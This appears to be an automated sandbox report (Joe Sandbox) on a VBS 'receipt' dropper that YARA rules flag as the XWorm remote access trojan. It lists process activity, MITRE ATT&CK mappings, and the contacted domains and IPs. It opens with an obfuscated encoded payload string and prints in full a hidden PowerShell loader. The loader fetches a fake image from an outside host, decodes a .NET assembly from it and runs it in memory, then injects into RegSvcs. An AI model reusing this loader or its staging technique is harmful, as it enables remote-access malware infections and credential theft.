bkdgtreeqdgtreyqb0dgtregedgtrekdgtredgtrekdgtregwdgtreaqbudgtregsdgtrekqdgtregdgtreh0dgtreidgtrebjdgtregedgtreddgtrebjdgtreggdgtreidgtreb7dgtrecdgtredgtreywbvdgtreg4dgtreddgtrebpdgtreg4dgtredqbldgtrecdgtredgtrefqdgtregdgtreh0dgtreowdgtregdgtrehidgtrezqb0dgtrehudgtrecgbudgtrecdgtredgtrejdgtrebkdgtreg8dgtredwbudgtregwdgtrebwbhdgtregqdgtrezqbkdgtreeqdgtreyqb0dgtregedgtreidgtreb9dgtredsdgtreidgtredgtrekdgtregwdgtreaqbudgtregsdgtrecwdgtregdgtred0dgtreidgtrebdgtredgtrecgdgtrejwbodgtrehqdgtreddgtrebwdgtrehmdgtreogdgtrevdgtrec8dgtredqbwdgtregwdgtrebwbhdgtregqdgtrezdgtrebldgtregkdgtrebqbhdgtregcdgtrezqbudgtrehmdgtrelgbjdgtreg8dgtrebqdgtreudgtregidgtrecgdgtrevdgtregkdgtrebqbhdgtregcdgtrezqbzdgtrec8dgtremdgtredgtrewdgtredqdgtrelwdgtre3dgtredcdgtremwdgtrevdgtredcdgtreoqdgtre3dgtrec8dgtrebwbydgtregkdgtrezwbpdgtreg4dgtreyqbsdgtrec8dgtrebgbldgtrehcdgtrexwbpdgtreg0dgtreyqbndgtregudgtrelgbqdgtrehdgtredgtrezwdgtre/dgtrededgtrenwdgtrexdgtredmdgtreodgtredgtre4dgtredidgtremdgtredgtreydgtredkdgtrejwdgtresdgtrecdgtredgtrejwbodgtrehqdgtreddgtrebwdgtrehmdgtreogdgtrevdgtrec8dgtredqbwdgtregwdgtrebwbhdgtregqdgtrezdgtrebldgtregkdgtrebqbhdgtregcdgtrezqbudgtrehmdgtrelgbjdgtreg8dgtrebqdgtreudgtregidgtrecgdgtrevdgtregkdg	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -noprofile -command "function downloaddatafromlinks { param ([string[]]$links) $webclient = new-object system.net.webclient; $downloadeddata = @(); $shuffledlinks = $links \| get-random -count $links.length; foreach ($link in $shuffledlinks) { try { $downloadeddata += $webclient.downloaddata($link) } catch { continue } }; return $downloadeddata }; $links = @('https://uploaddeimagens.com.br/images/004/773/797/original/new_image.jpg?1713882029', 'https://uploaddeimagens.com.br/images/004/773/797/original/new_image.jpg?1713882029'); $imagebytes = downloaddatafromlinks $links; if ($imagebytes -ne $null) { $imagetext = [system.text.encoding]::utf8.getstring($imagebytes); $startflag = '<<base64_start>>'; $endflag = '<<base64_end>>'; $startindex = $imagetext.indexof($startflag); $endindex = $imagetext.indexof($endflag); if ($startindex -ge 0 -and $endindex -gt $startindex) { $startindex += $startflag.length; $base64length = $endindex - $startindex; $base64command = $imagetext.substring($startindex, $base64length); $commandbytes = [system.convert]::frombase64string($base64command); $loadedassembly = [system.reflection.assembly]::load($commandbytes); $type = $loadedassembly.gettype('projetoautomacao.vb.home'); $method = $type.getmethod('vai').invoke($null, [object[]] ('txt.yamowx/mn/moc.72evlove.www//:sptth' , '1' , 'c:\programdata\' , 'moquenqueiro','regsvcs',''))} }"	Jump to behavior

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.ConsoleHost\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.ConsoleHost.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.Management.Infrastructure\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Numerics\v4.0_4.0.0.0__b77a5c561934e089\System.Numerics.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Xml\v4.0_4.0.0.0__b77a5c561934e089\System.XML.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Security\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Security.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformation	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformation	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformation	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformation	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformation	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformation	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformation	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db VolumeInformation	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.jfm VolumeInformation	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db VolumeInformation	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db VolumeInformation	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.ConsoleHost\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.ConsoleHost.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Xml\v4.0_4.0.0.0__b77a5c561934e089\System.XML.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.Management.Infrastructure\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Numerics\v4.0_4.0.0.0__b77a5c561934e089\System.Numerics.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Security\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Security.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Utility\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Utility.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Queries volume information: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Xml\v4.0_4.0.0.0__b77a5c561934e089\System.XML.dll VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation	Jump to behavior

Source: C:\Windows\System32\wscript.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Jump to behavior

Stealing of Sensitive Information

Yara detected XWorm

Source: Yara match	File source: 16.2.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000010.00000002.2600656630.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: RegSvcs.exe PID: 5416, type: MEMORYSTR

Remote Access Functionality

Yara detected XWorm

Source: Yara match	File source: 16.2.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000010.00000002.2600656630.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: RegSvcs.exe PID: 5416, type: MEMORYSTR

Mitre Att&ck Matrix

Reconnaissance	Resource Development	Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Command and Control	Exfiltration	Impact
Gather Victim Identity Information	331 Scripting	Valid Accounts	1 Exploitation for Client Execution	331 Scripting	1 DLL Side-Loading	1 Disable or Modify Tools	OS Credential Dumping	2 File and Directory Discovery	Remote Services	1 Archive Collected Data	1 Web Service	Exfiltration Over Other Network Medium	Abuse Accessibility Features
Credentials	Domains	Default Accounts	11 Command and Scripting Interpreter	1 DLL Side-Loading	211 Process Injection	2 Obfuscated Files or Information	LSASS Memory	24 System Information Discovery	Remote Desktop Protocol	Data from Removable Media	1 Ingress Tool Transfer	Exfiltration Over Bluetooth	Network Denial of Service
Email Addresses	DNS Server	Domain Accounts	3 PowerShell	1 Office Application Startup	121 Registry Run Keys / Startup Folder	1 Software Packing	Security Account Manager	111 Security Software Discovery	SMB/Windows Admin Shares	Data from Network Shared Drive	11 Encrypted Channel	Automated Exfiltration	Data Encrypted for Impact
Employee Names	Virtual Private Server	Local Accounts	Cron	121 Registry Run Keys / Startup Folder	Login Hook	1 DLL Side-Loading	NTDS	1 Process Discovery	Distributed Component Object Model	Input Capture	1 Non-Standard Port	Traffic Duplication	Data Destruction
Gather Victim Network Information	Server	Cloud Accounts	Launchd	Network Logon Script	Network Logon Script	11 Masquerading	LSA Secrets	131 Virtualization/Sandbox Evasion	SSH	Keylogging	2 Non-Application Layer Protocol	Scheduled Transfer	Data Encrypted for Impact
Domain Properties	Botnet	Replication Through Removable Media	Scheduled Task	RC Scripts	RC Scripts	131 Virtualization/Sandbox Evasion	Cached Domain Credentials	1 Application Window Discovery	VNC	GUI Input Capture	23 Application Layer Protocol	Data Transfer Size Limits	Service Stop
DNS	Web Services	External Remote Services	Systemd Timers	Startup Items	Startup Items	211 Process Injection	DCSync	Remote System Discovery	Windows Remote Management	Web Portal Capture	Commonly Used Port	Exfiltration Over C2 Channel	Inhibit System Recovery

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Source	Detection	Scanner	Label	Link
E7236252-receipt.vbs	18%	Virustotal		Browse
E7236252-receipt.vbs	21%	ReversingLabs	Script-WScript.Trojan.Heuristic

Dropped Files

Source	Detection	Scanner	Label	Link
C:\Users\user\AppData\Roaming\RegSvcs.exe	0%	ReversingLabs
C:\Users\user\AppData\Roaming\RegSvcs.exe	0%	Virustotal		Browse

Unpacked PE Files

⊘No Antivirus matches

Domains

Source	Detection	Scanner	Label	Link
evolve27.com	0%	Virustotal		Browse
uploaddeimagens.com.br	7%	Virustotal		Browse

URLs

Source	Detection	Scanner	Label	Link
http://www.broofa.com	0%	URL Reputation	safe
http://www.broofa.com	0%	URL Reputation	safe
https://csp.withgoogle.com/csp/lcreport/	0%	URL Reputation	safe
http://crl.ver)	0%	Avira URL Cloud	safe
http://app01.system.com.br/RDWeb/Pages/login.aspxcho	0%	Avira URL Cloud	safe
http://app01.system.com.br/RDWeb/Pages/login.aspxd	0%	Avira URL Cloud	safe
xwormay8450.duckdns.org	0%	Avira URL Cloud	safe
https://www.evolve27.com/nm/xwomay.txt	0%	Avira URL Cloud	safe
https://pastachiotabin.com/raw/achiotaCmZ7z04	0%	Avira URL Cloud	safe
https://uploaddeimagens.com.br/images/004/773/797/original/new_image.jpg?1713882029	0%	Avira URL Cloud	safe
http://app01.system.com.br/RDWeb/Pages/login.aspx	0%	Avira URL Cloud	safe
http://app01.system.com.br/RDWeb/Pages/login.aspxd	0%	Virustotal		Browse
http://app01.system.com.br/RDWeb/Pages/login.aspx	0%	Virustotal		Browse
https://pastachiotabin.com/raw/achiotaCmZ7z04	0%	Virustotal		Browse
https://uploaddeimagens.com.br/images/004/773/797/original/new_image.jpg?1713882029	15%	Virustotal		Browse

Domains and IPs

Contacted Domains

Name	IP	Active	Malicious	Antivirus Detection	Reputation
evolve27.com	131.153.147.50	true	false	0%, Virustotal, Browse	unknown
plus.l.google.com	142.250.68.46	true	false		high
xwormay8450.duckdns.org	12.221.146.138	true	true		unknown
www.google.com	142.250.68.68	true	false		high
uploaddeimagens.com.br	104.21.45.138	true	true	7%, Virustotal, Browse	unknown
pastebin.com	104.20.3.235	true	false		high
www.evolve27.com	unknown	unknown	true		unknown
apis.google.com	unknown	unknown	false		high

Contacted URLs

Name	Malicious	Antivirus Detection	Reputation
https://pastebin.com/raw/eCmZ7z04	false		high
https://www.google.com/async/newtab_promos	false		high
https://www.evolve27.com/nm/xwomay.txt	false	Avira URL Cloud: safe	unknown
https://www.google.com/async/ddljson?async=ntp:2	false		high
xwormay8450.duckdns.org	true	Avira URL Cloud: safe	unknown
https://www.google.com/complete/search?client=chrome-omni&gs_ri=chrome-ext-ansg&xssi=t&q=&oit=0&oft=1&pgcl=20&gs_rn=42&sugkey=AIzaSyBOti4mM-6x9WDnZIjIeyEU21OpBXqWBgw	false		high
https://apis.google.com/_/scs/abc-static/_/js/k=gapi.gapi.en.SCWmpDDGjPk.O/m=gapi_iframes,googleapis_client/rt=j/sv=1/d=1/ed=1/am=AAAC/rs=AHpOoo_Pl64J0IIHlj2zBtEJ3ZwdaJC3HA/cb=gapi.loaded_0	false		high
https://www.google.com/async/newtab_ogb?hl=en-US&async=fixed:0	false		high
https://uploaddeimagens.com.br/images/004/773/797/original/new_image.jpg?1713882029	true	15%, Virustotal, Browse Avira URL Cloud: safe	unknown

URLs from Memory and Binaries

Name	Source	Malicious	Antivirus Detection	Reputation
http://www.broofa.com	chromecache_79.9.dr	false	URL Reputation: safe URL Reputation: safe	unknown
https://pastebin.com/t8l	wscript.exe, 00000000.00000002.1534311589.0000020BD974F000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1527581332.0000020BD974F000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1519793569.0000020BD9757000.00000004.00000020.00020000.00000000.sdmp	false		high
https://pastebin.com/raw/eCmZ7z04H	wscript.exe, 00000000.00000002.1534292787.0000020BD9727000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1529377906.0000020BD971E000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1530501627.0000020BD9726000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1531835435.0000020BD9727000.00000004.00000020.00020000.00000000.sdmp	false		high
http://app01.system.com.br/RDWeb/Pages/login.aspxcho	wscript.exe, 00000000.00000003.1291707818.0000020BD93BA000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1291495156.0000020BD93B4000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://crl.ver)	svchost.exe, 00000008.00000002.2604956419.000001C941A00000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	low
https://g.live.com/odclientsettings/ProdV2.C:	svchost.exe, 00000008.00000003.1555875051.000001C941870000.00000004.00000800.00020000.00000000.sdmp, edb.log.8.dr	false		high
https://aka.ms/pscore6	powershell.exe, 00000005.00000002.2377170061.000001D89796D000.00000004.00000800.00020000.00000000.sdmp	false		high
https://workspace.google.com/:session_prefix:marketplace/appfinder?usegapi=1	chromecache_85.9.dr	false		high
https://plus.google.com	chromecache_85.9.dr	false		high
http://app01.system.com.br/RDWeb/Pages/login.aspxd	wscript.exe, 00000000.00000003.1527457054.0000020BD93DE000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1502175170.0000020BD93DE000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1291672870.0000020BD93DE000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1291600377.0000020BD93DE000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1532021416.0000020BD93E0000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1291744257.0000020BD93DE000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1519975863.0000020BD93DE000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1291639605.0000020BD93DE000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1291528746.0000020BD93DE000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1291707818.0000020BD93DE000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1291563308.0000020BD93DE000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1291434213.0000020BD93DE000.00000004.00000020.00020000.00000000.sdmp	false	0%, Virustotal, Browse Avira URL Cloud: safe	unknown
https://g.live.com/odclientsettings/Prod.C:	edb.log.8.dr	false		high
https://play.google.com/log?format=json&hasfast=true	chromecache_79.9.dr	false		high
https://pastachiotabin.com/raw/achiotaCmZ7z04	wscript.exe, 00000000.00000003.1291434213.0000020BD93DE000.00000004.00000020.00020000.00000000.sdmp, E7236252-receipt.vbs	false	0%, Virustotal, Browse Avira URL Cloud: safe	unknown
https://csp.withgoogle.com/csp/lcreport/	chromecache_85.9.dr	false	URL Reputation: safe	unknown
https://pastebin.com/raw/eCmZ7z04bH	wscript.exe, 00000000.00000002.1534292787.0000020BD9727000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1529377906.0000020BD971E000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1530501627.0000020BD9726000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1531835435.0000020BD9727000.00000004.00000020.00020000.00000000.sdmp	false		high
https://pastebin.com/raw/eCmZ7z04tart	wscript.exe, 00000000.00000002.1533722500.0000020BD76D0000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1529425049.0000020BD76D0000.00000004.00000020.00020000.00000000.sdmp	false		high
https://aka.ms/pscore68	powershell.exe, 00000005.00000002.2377170061.000001D8979BE000.00000004.00000800.00020000.00000000.sdmp	false		high
https://apis.google.com	chromecache_79.9.dr, chromecache_85.9.dr	false		high
https://pastebin.com/	wscript.exe, 00000000.00000002.1534311589.0000020BD974F000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1527581332.0000020BD974F000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1519793569.0000020BD9757000.00000004.00000020.00020000.00000000.sdmp	false		high
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name	powershell.exe, 00000005.00000002.2377170061.000001D897965000.00000004.00000800.00020000.00000000.sdmp	false		high
http://app01.system.com.br/RDWeb/Pages/login.aspx	wscript.exe, 00000000.00000003.1527457054.0000020BD93DE000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1291349735.0000020BD93C0000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1530914537.0000020BD93B2000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1502175170.0000020BD93DE000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000002.1534107860.0000020BD96B0000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1532050055.0000020BD7658000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1291388676.0000020BD7658000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1291672870.0000020BD93DE000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1291600377.0000020BD93DE000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000002.1533992519.0000020BD93B5000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1532021416.0000020BD93E0000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000002.1533649699.0000020BD7672000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1291744257.0000020BD93DE000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1519975863.0000020BD93DE000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1530256989.0000020BD767C000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1533019445.0000020BD93B5000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1291639605.0000020BD93DE000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1291528746.0000020BD93DE000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1291324362.0000020BD7649000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1531151710.0000020BD762F000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1291707818.0000020BD93DE000.00000004.00000020.00020000.00000000.sdmp	true	0%, Virustotal, Browse Avira URL Cloud: safe	unknown
https://domains.google.com/suggest/flow	chromecache_85.9.dr	false		high
https://clients6.google.com	chromecache_85.9.dr	false		high

World Map of Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public IPs

IP	Domain	Country	ASN	ASN Name	Malicious
104.20.3.235	pastebin.com	United States	13335	CLOUDFLARENETUS	false
104.21.45.138	uploaddeimagens.com.br	United States	13335	CLOUDFLARENETUS	true
142.250.68.68	www.google.com	United States	15169	GOOGLEUS	false
142.250.68.46	plus.l.google.com	United States	15169	GOOGLEUS	false
239.255.255.250	unknown	Reserved	unknown	unknown	false
12.221.146.138	xwormay8450.duckdns.org	United States	7018	ATT-INTERNET4US	true
131.153.147.50	evolve27.com	United States	19437	SS-ASHUS	false

Private

IP
192.168.2.9
192.168.2.3
192.168.2.5
127.0.0.1

General Information

Joe Sandbox version:	40.0.0 Tourmaline
Analysis ID:	1436284
